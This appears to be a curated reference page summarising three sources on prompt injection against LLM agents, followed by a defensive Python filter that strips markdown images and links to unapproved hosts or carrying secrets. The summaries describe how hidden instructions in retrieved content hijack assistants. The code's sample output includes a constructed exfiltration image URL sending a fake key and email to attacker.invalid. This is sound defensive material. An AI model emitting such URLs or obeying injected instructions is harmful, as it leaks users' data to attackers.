Reference library
The best external writing on AI testing, limitations and quality — curated, summarized, and rated. We link out to the source; the value-add is our summary and the findings each piece connects to.
3 references
- White paper · High credibility · OWASP
OWASP Top 10 for Large Language Model Applications
A community-built catalog of the most critical security risks for LLM applications — prompt injection, insecure output handling, training-data poisoning, and more — with mitigations for each.
🐛 1 linked finding · Tags: Prompt injection, Safety
- Blog · High credibility · Simon Willison’s Weblog
Prompt injection: what’s the worst that can happen?
An accessible explanation of why prompt injection is hard to fix: once an LLM agent processes untrusted content, that content can hijack its instructions. Walks through concrete exfiltration and abuse scenarios for tool-using assistants.
🐛 2 linked findings · Tags: Prompt injection, Safety, Agents
- Paper · High credibility · arXiv
Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection
Demonstrates indirect prompt injection against real LLM-integrated applications: adversarial instructions hidden in web pages, emails, or other retrieved content hijack the model when it later processes that content, so the attacker never needs access to the prompt itself. Catalogs concrete attacks (data theft, manipulation) on tool- and retrieval-connected systems.
🐛 2 linked findings · Tags: Prompt injection, Safety, Agents
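Both Willison's post and the Greshake et al. paper above describe exfiltration through an assistant's own output: an injected instruction makes the model emit a markdown image or link whose URL carries conversation data to a host the attacker controls, and the chat client fetches it without a click. The following is an added example, not code from any of the linked pieces, of the narrow check a practitioner can put in front of the renderer: allow image and link URLs only on an exact-match set of https hosts, and drop any URL that contains a string the conversation treats as sensitive. The allowlist, the sample assistant output and the sample secrets are all constructed for illustration.

```python
import re
from urllib.parse import urlparse, unquote

# Hosts the chat client may fetch images from or link to. Constructed for this
# example; a real deployment would use its own CDN / documentation hosts.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Markdown image ![alt](url) and link [text](url), with an optional "title".
# Images are the worse channel: the client fetches them with no click, so the
# GET request alone delivers whatever the URL carries to the remote host.
MD_LINK_RE = re.compile(r'(!?)\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')


def url_is_allowed(url: str) -> bool:
    """Only https URLs whose exact host is allowlisted may be rendered."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return False
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


def url_carries_secrets(url: str, secrets) -> bool:
    """True if any sensitive string from the conversation appears anywhere in
    the URL after percent-decoding (attackers encode the payload)."""
    decoded = unquote(url).lower()
    return any(s and s.lower() in decoded for s in secrets)


def filter_output(markdown: str, secrets=()):
    """Rewrite assistant output before it reaches the renderer.

    Returns (clean_markdown, findings). Each finding is (kind, url, reason)
    with kind in {"image", "link"} and reason in {"secret-in-url",
    "host-not-allowed"}. Offending images and links are replaced by a visible
    marker, so nothing is fetched automatically and the URL (which may embed
    the secret) is not shown either.
    """
    findings = []

    def repl(match):
        bang, text, url = match.group(1), match.group(2), match.group(3)
        kind = "image" if bang else "link"
        if url_carries_secrets(url, secrets):
            reason = "secret-in-url"
        elif not url_is_allowed(url):
            reason = "host-not-allowed"
        else:
            return match.group(0)  # safe: leave untouched
        findings.append((kind, url, reason))
        label = text or kind
        return f"[{label} removed: {reason}]"

    return MD_LINK_RE.sub(repl, markdown), findings


# Constructed sample: what an assistant might emit after reading a web page
# that carried a hidden instruction to encode the user's data into an image
# URL. The key and address stand in for values seen earlier in the chat.
SAMPLE_SECRETS = ["sk-live-9f3a7c", "alice@example.com"]
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![status](https://cdn.example.com/ok.png)\n"
    "![](https://attacker.invalid/log?d=sk-live-9f3a7c%20alice%40example.com)\n"
    "See [the docs](https://docs.example.com/guide) and "
    "[this mirror](http://docs.example.com/guide)."
)


def run_sample():
    return filter_output(SAMPLE_OUTPUT, SAMPLE_SECRETS)


if __name__ == "__main__":
    clean, findings = run_sample()
    print(clean)
    for finding in findings:
        print("BLOCKED", *finding)
```

Two design points worth noting. The host check is an exact match on the parsed hostname, not a substring test, so `cdn.example.com.attacker.invalid` is rejected; and the secret check runs on the percent-decoded URL, because the injected instruction will usually tell the model to URL-encode the payload. This closes one exfiltration channel only; as Willison's post argues, it does not stop the model from being hijacked in the first place.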